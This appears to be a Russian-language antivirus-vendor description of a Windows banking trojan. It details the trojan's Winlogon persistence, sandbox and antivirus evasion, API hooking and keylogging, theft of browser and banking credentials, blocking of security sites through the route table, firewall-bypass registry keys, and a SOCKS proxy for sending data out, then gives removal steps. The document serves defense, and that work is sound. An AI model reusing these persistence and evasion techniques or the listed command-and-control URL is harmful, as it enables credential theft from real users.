Технические детали

Троянская программа, выполняющая деструктивные действия на компьютере пользователя. Программа является приложением Windows (PE-EXE файл). Имеет размер 103936 байт. Упакована неизвестным упаковщиком. Написана на C++.

Инсталляция

При запуске троянец копирует свой исполняемый файл в системный каталог Windows под следующим именем:

%System%/rnd.exe

Где rnd – случайная последовательность из 7 цифр или букв латинского алфавита.

Для автоматического запуска при каждом следующем старте системы троянец добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:

[HKLM/Software/Microsoft/Windows NT/CurrentVersion/Winlogon]
"Userinit"=" C:/Windows/system32/userinit.exe,//?/globalroot/systemroot/system32/rnd.exe,"

Деструктивная активность

Троянец завершает свое выполнение при обнаружении в своем адресном пространстве библиотеки с именем:

sbiedll.dll

а также при наличии на компьютере пользователя файла:

%System%/drivers/vmhgfs.sys

Таким образом вредонос противодействует технологиям автоматического анализа программ для обнаружения их вредоносной активности.

Троянец запускает свою копию и завершает работу.

Копия троянца выполняет следующие действия:

• проверяет наличие строки "С:/sand-box/" в пути к своему оригинальному файлу. Если строка найдена, то троянец завершает свою работу и удаляет свой исполняемый файл.
• проверяет наличие установленных антивирусов на зараженном компьютере путем поиска окон с именем класса "____AVP.Root" для Антивируса Касперского, проверки наличия файла с именем "%system%/drivers/avgtdix.sys" для AVG Anti-virus, ключа системного реестра "HKLM/Software/Avira/AntiVir PersonalEdition Classic/" для Avira AntiVir и именованного канала "////.//pipe//acsipc_server" для Agnitum Outpost.
• пытается остановить или помешать работе найденных антивирусов.
• ищет системный процесс "services.exe" и внедряет в его адресное пространство код библиотеки, которая содержится в теле данной троянской программы и детектируется Антивирусом Касперского как Trojan-Spy.Win32.Shiz.cj.

После этого троянец завершает свою работу.

Вредоносная библиотека, внедренная в процесс "services.exe", выполняет следующие действия:

1. Создает поток, в котором в бесконечном цикле устанавливает функции-перехватчики на следующие API-функции:

getaddrinfo
gethostbyname
inet_addr
CryptEncrypt
CreateFileW
GetFileAttributesExW
send
WSASend
RCN_R50Buffer
GetWindowText

Что позволяет вредоносу следить и анализировать сетевой трафик, шифруемые данные и создаваемые файлы.

2. Отправляет запрос на следующий ресурс:

http://brandavion.com/knok.php?id=имя пользователя!имя компьютера пользователя!метка тома и серийный номер&ver=10&up=89811&os=сведения об операционной системе

В ответ получает URL для загрузки файла, файл сохраняется во временном каталоге текущего пользователя Windows со случайным именем:

%Temp%/rnd.tmp

Где rnd - случайный набор цифр и латинских букв, например, "6D5".

На момент создания описания ресурс был недоступен.

Также троянец может получать команды для дальнейшей своей работы в виде параметра для ключа системного реестра:

[HKLM/Software/Microsoft]

Таким образом в зависимости от имени параметра ключа реестра вредонос может:

• загружать по полученному от злоумышленник URL и запускать на исполнение файл, который сохраняется под следующим именем:

С:/temp_file_bin

• удалять файлы и каталоги
• выполнять рекурсивное удаление всех файлов и каталогов на всех доступных логических дисках компьютера пользователя, после чего завершать процессы:

smss.exe
csrss.exe
lsass.exe
winlogon.exe

3. Внедряет вредоносный код в следующие процессы:

iexplore.exe
opera.exe
java.exe
javaw.exe
explorer.exe
isclient.exe
intpro.exe
mnp.exe
loadmain.exe

код устанавливает перехватчик API-функции "HttpSendRequest", выполняющий функционал кейлоггера. Собранные данные о посещенных сайтах и нажатых клавишах сохраняются в следующем файле:

%ProgramFiles%/Common Files/keylog.txt

4. Проверяет наличие установленных антивирусов и пытается завершить или помешать их работе.
5. Добавляет запись в таблицу сетевых маршрутов (тем самым блокируя доступ к ресурсам), выполнив команды:

route.exe -p add IP адрес1 mask <маска подсети> IP адрес2

Где IP адрес2 - IP адрес компьютера пользователя;

IP адрес1 - IP адрес блокируемых вредоносом ресурсов. Вредонос блокировал доступ к следующим IP адресам

:

74.55.143.0
62.67.184.0
208.43.44.0
188.40.74.0
212.59.118.0
81.176.67.0
87.242.75.0
83.102.130.0
207.44.254.0
75.125.212.0
74.86.125.0
75.125.43.0
75.125.189.0
74.54.46.0
74.54.130.0
174.120.184.0
174.120.185.0
174.133.38.0
74.54.139.0
74.86.232.0
74.53.70.0
208.43.71.0
174.120.186.0
75.125.185.0
74.55.74.0
95.140.225.0
94.236.0.0
94.23.206.0
93.191.13.0
93.184.71.0
92.53.106.0
92.123.155.0
91.209.196.0
91.199.212.0
91.121.97.0
90.183.101.0
90.156.159.0
89.202.157.0
89.202.149.0
89.111.176.0
89.108.66.0
88.221.119.0
87.242.79.0
87.242.74.0
87.242.72.0
87.238.48.0
87.230.79.0
87.106.254.0
87.106.242.0
85.31.222.0
85.255.19.0
85.214.106.0
85.17.210.0
85.12.57.0
84.40.30.0
83.223.117.0
83.222.31.0
83.222.23.0
83.202.175.0
82.98.86.0
82.165.103.0
82.151.107.0
82.117.238.0
81.24.35.0
81.177.31.0
81.176.66.0
80.86.107.0
80.237.132.0
80.190.154.0
80.190.130.0
80.153.193.0
79.125.5.0
78.47.87.0
78.137.164.0
78.108.86.0
75.125.82.0
75.125.29.0
74.55.40.0
74.53.201.0
74.52.233.0
74.50.0.0
74.208.20.0
74.208.158.0
74.125.77.0
72.32.70.0
72.32.149.0
72.32.125.0
72.3.254.0
72.232.246.0
70.84.211.0
69.93.226.0
69.57.142.0
69.20.104.0
69.18.148.0
69.162.79.0
68.177.102.0
67.227.172.0
67.225.206.0
67.192.135.0
67.19.34.0
67.15.231.0
67.15.103.0
67.134.208.0
66.77.70.0
66.249.17.0
66.223.50.0
65.55.240.0
65.55.184.0
65.175.38.0
64.78.182.0
64.66.190.0
64.41.151.0
64.41.142.0
64.246.4.0
64.202.189.0
64.13.134.0
64.128.133.0
63.85.36.0
62.75.216.0
62.75.163.0
62.213.110.0
62.189.194.0
62.146.66.0
62.146.210.0
62.14.249.0
38.113.1.0
217.174.103.0
217.170.21.0
217.16.16.0
217.106.234.0
216.99.133.0
216.55.183.0
216.49.94.0
216.49.88.0
216.246.90.0
216.239.122.0
216.12.145.0
216.10.192.0
213.31.172.0
213.220.100.0
213.198.89.0
213.171.218.0
213.133.34.0
212.8.79.0
212.72.62.0
212.67.88.0
212.47.219.0
209.87.209.0
209.62.68.0
209.62.112.0
209.51.167.0
209.216.46.0
209.160.22.0
209.157.69.0
209.124.55.0
208.79.250.0
207.66.0.0
207.46.232.0
207.46.20.0
207.46.18.0
207.44.154.0
206.204.52.0
205.227.136.0
205.178.145.0
204.14.90.0
203.160.188.0
199.203.243.0
198.6.49.0
195.70.37.0
195.64.225.0
195.55.72.0
195.210.42.0
195.2.240.0
195.146.235.0
195.137.160.0
194.33.180.0
194.206.126.0
194.112.106.0
194.109.142.0
194.0.200.0
193.71.68.0
193.69.114.0
193.66.251.0
193.24.237.0
193.193.194.0
193.17.85.0
193.110.109.0
193.1.193.0
193.0.6.0
192.150.94.0
188.93.8.0
18.85.2.0
166.70.98.0
165.160.15.0
162.40.10.0
155.35.248.0
150.70.93.0
149.101.225.0
141.202.248.0
139.91.222.0
128.130.60.0
128.130.56.0
128.111.48.0

6. Получает ресурсы и сохраненные пароли к ним, анализируя файлы настроек браузеров.
7. Ворует банковские реквизиты пользователей следующих систем онлайн банкинга:

Inter-PRO Client
РФК Клиент-Web
FAKTURA.ru
RAIFFEISEN
WebMoney Keeper

8. Для обхода встроенного брандмауэра Windows XP (Windows Firewall) создает ключи системного реестра:

[HKLM/System/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile/AuthorizedApplications/List]
"%System%/services.exe" = "%System%/services.exe :*:Enabled:svchost"

[HKLM/System/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile/GloballyOpenPorts/List]
"rnd2:TCP" = "rnd2:TCP:*:Enabled:services.exe"

Где rnd2 - случайное число.

Создает на зараженной системе SOCKS-прокси сервер на случайном TCP порте, с помощью которого отсылает злоумышленнику собранные данные:

http://******avion.com/socks.php

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

1. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
2. Удалить копию троянской программы:

%System%/rnd.exe

3. Удалить файлы:

С:/temp_file_bin
%ProgramFiles%/Common Files/keylog.txt

4. Изменить значение ключа системного реестра на:

[HKLM/Software/Microsoft/Windows NT/CurrentVersion/Winlogon]
"Userinit"=" C:/Windows/system32/userinit.exe,"

5. Для очистки таблицы маршрутов от записей для всех шлюзов выполнить команду в командной строке:

route.exe -f

6. Удалить ключи системного реестра:

[HKLM/System/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile/AuthorizedApplications/List]
"%System%/services.exe" = "%System%/services.exe :*:Enabled:svchost"

[HKLM/System/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile/GloballyOpenPorts/List]
":TCP" = ":TCP:*:Enabled:services.exe"

7. Очистить каталог Temporary Internet Files.
8. Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).

Источник: securelist.com.

перейти в архив